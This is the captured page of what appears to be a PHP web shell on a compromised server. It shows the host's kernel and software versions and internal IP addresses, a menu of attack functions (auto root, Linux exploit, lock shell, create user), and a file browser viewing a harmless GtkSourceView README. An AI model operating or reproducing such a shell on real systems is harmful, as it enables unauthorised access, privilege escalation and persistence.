Linux ns1.utparral.edu.mx 6.8.0-79-generic #79~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Aug 15 16:54:53 UTC 2 x86_64
Apache/2.4.58 (Unix) OpenSSL/1.1.1w PHP/8.2.12 mod_perl/2.0.12 Perl/v5.34.1
: 10.10.1.9 | : 10.10.1.254
Cant Read [ /etc/named.conf ]
daemon
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
libgtksourceview-4-0 /
[ HOME SHELL ]
Name
Size
Permission
Action
AUTHORS
462
B
-rw-r--r--
changelog.Debian.gz
808
B
-rw-r--r--
copyright
3.57
KB
-rw-r--r--
NEWS.gz
12.63
KB
-rw-r--r--
README.md
1.09
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : README.md
GtkSourceView ============= GtkSourceView is a GNOME library that extends GtkTextView, the standard GTK+ widget for multiline text editing. GtkSourceView adds support for syntax highlighting, undo/redo, file loading and saving, search and replace, a completion system, printing, displaying line numbers, and other features typical of a source code editor. The GtkSourceView library is free software and is released under the terms of the GNU Lesser General Public License, see the 'COPYING' file for more details. The official web site is https://wiki.gnome.org/Projects/GtkSourceView. Dependencies ------------ * GLib >= 2.48 * GTK+ >= 3.24 * libxml2 >= 2.6 * freebidi >= 0.19.7 Installation ------------ Simple install procedure from a tarball: ``` $ mkdir build $ meson build $ cd build [ Become root if necessary ] $ ninja install ``` See the file 'INSTALL' for more detailed information. To build the latest version of GtkSourceView plus its dependencies from Git, [Jhbuild](https://wiki.gnome.org/Projects/Jhbuild) is recommended. How to contribute ----------------- See the 'HACKING' file.
Close